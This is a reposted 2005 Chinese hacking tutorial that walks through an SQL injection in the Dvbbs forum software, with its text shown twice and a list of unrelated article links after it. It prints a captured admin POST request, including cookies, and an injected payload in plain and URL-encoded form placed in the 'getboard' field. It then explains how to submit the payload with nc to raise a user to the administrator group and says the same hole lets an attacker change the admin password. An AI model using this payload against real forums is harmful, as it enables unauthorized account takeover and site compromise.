再次让动网下地狱
2005-09-02 09:39
232 查看
首先找一个没有固顶帖子的版面,自己找找去。一个论坛总不可能哪个版块都有固顶吧?点进去看看有没有固定帖子什么的,我是自己架设的平台做测试的。当然要“符合”漏洞条件了。以前台管理员的身份登陆,也不一定要用前台管理员进去,一个斑竹就行,能固顶帖子就行了,然后随便发个帖子。然后点下设置固顶如图1
按正常的方式固顶,如图2
到这里我们先暂停,打开WSE抓包工具准备抓取提交的post信息,打开了之后点下确认操作。现在看看WSE抓到些什么东西了,如图3
截取到了post提交信息,复制下来,内容如下:
POST /sql/admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.254/ href="http://hackbase.com/hacker" target=_blank>sql/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; TencentTraveler ; .NET CLR 1.1.4322)
Host: 192.168.1.254
Content-Length: 133
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 192%2E168%2E1%2E254%2Fsql%2F=UserID=1&usercookies=0&password=9pb621664s5w7IL7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=1929167667; ASPSESSIONIDCATQTATT=JJGHMOMDLJJAAFHAGMLGOMIL; ASPSESSIONIDACTTRATS=NMLHLBBAPMOIEGAIBMBFOIMH; Dvbbs=; upNum=0
istopaction=1&boardID=1&ID=1&title=&content=a&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7
现在我们做什么呢?把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码,用encoder.exe转一下,转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20
把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组,不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值,我也懒得去数就改成250吧。修改完之后就用NC提交,如图4
意思是将a.txt的内容用nc提交上去然后将返回的信息保存在1.htm里面.
接着打开我们输出的1.htm看看,如图5
语法错误?知道是为什么吗?前面我说过了,Content-Length的长度我没数,语句只执行到1,1);update [dv_user] set usergroupid=1 where user这里,语句都没执行完,能正确吗?不过不要紧,我们把长度多加几个数就改成278吧然后再次提交,然后查看1.htm的输出结果,如图6
看到没有?操作成功。成功执行了我们的注入语句。我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是:619054,为了省事,我就直接在后台查看下这个用户的权限是否为管理员了,如图7
呵呵,真的提升为管理员了,这个漏洞不光可以将用户从普通权限提升为管理员,而且还可以直接更改后台管理员的密码,这够严重的吧?动网官方论坛到现在都还没出补丁。真够郁闷的
上一页 [1] [2]
按正常的方式固顶,如图2
到这里我们先暂停,打开WSE抓包工具准备抓取提交的post信息,打开了之后点下确认操作。现在看看WSE抓到些什么东西了,如图3
截取到了post提交信息,复制下来,内容如下:
POST /sql/admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.254/ href="http://hackbase.com/hacker" target=_blank>sql/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; TencentTraveler ; .NET CLR 1.1.4322)
Host: 192.168.1.254
Content-Length: 133
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 192%2E168%2E1%2E254%2Fsql%2F=UserID=1&usercookies=0&password=9pb621664s5w7IL7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=1929167667; ASPSESSIONIDCATQTATT=JJGHMOMDLJJAAFHAGMLGOMIL; ASPSESSIONIDACTTRATS=NMLHLBBAPMOIEGAIBMBFOIMH; Dvbbs=; upNum=0
istopaction=1&boardID=1&ID=1&title=&content=a&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7
现在我们做什么呢?把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码,用encoder.exe转一下,转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20
把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组,不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值,我也懒得去数就改成250吧。修改完之后就用NC提交,如图4
意思是将a.txt的内容用nc提交上去然后将返回的信息保存在1.htm里面.
接着打开我们输出的1.htm看看,如图5
语法错误?知道是为什么吗?前面我说过了,Content-Length的长度我没数,语句只执行到1,1);update [dv_user] set usergroupid=1 where user这里,语句都没执行完,能正确吗?不过不要紧,我们把长度多加几个数就改成278吧然后再次提交,然后查看1.htm的输出结果,如图6
看到没有?操作成功。成功执行了我们的注入语句。我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是:619054,为了省事,我就直接在后台查看下这个用户的权限是否为管理员了,如图7
呵呵,真的提升为管理员了,这个漏洞不光可以将用户从普通权限提升为管理员,而且还可以直接更改后台管理员的密码,这够严重的吧?动网官方论坛到现在都还没出补丁。真够郁闷的
上一页 [1] [2]
相关文章推荐
- 再次让动网下地狱(DVBBS最新漏洞 6月17日)已带简单补丁
- android app 返回桌面后再次点击app图标启动 不要重新载入启动页面
- OSC招聘沙龙PHP开发专场顺利举办,再次超过一半人才拿到Offer
- 数组和指针再次来袭
- 20151208 再次搭建Oracle11g环境 ocp 047 20-40
- volist时,如何上传N个字段一样的数据以及如何在数据里再次处理
- hadoop再次集群搭建(3)-如何选择相应的hadoop版本
- 点击按钮加载iframe再次点击关闭iframe
- iOS AFN的再次封装
- 一个进程对一个文件加写锁后,另一个进程对相同的文件仍可以以读的模式打开,但是再次加写锁失败。
- iOS 点击图片全屏 再次点击取消
- 树状结构中展示的数据从数据库取出后进行再次封装使其方便UI层调用
- Java EE-Eclipse再次配置Tomcat服务器问题
- Application loader上传应用中断后,无法再次提交解决
- jQuery的ajaxFileUpload上传文件插件刷新一次才能再次调用触发change
- 图片点击放大,再次点击返回原视图.完美封装,一个类一句代码即可调用.IOS完美实现
- ios 第三方qq授权登陆,第一次登陆后,再次登陆,失效
- 新闻布局加其网络获取实现(ListView 的再次优化 )
- Android Voip再次总结 关于数据流的加密和解密
- 再次写给我们这些浮躁的程序员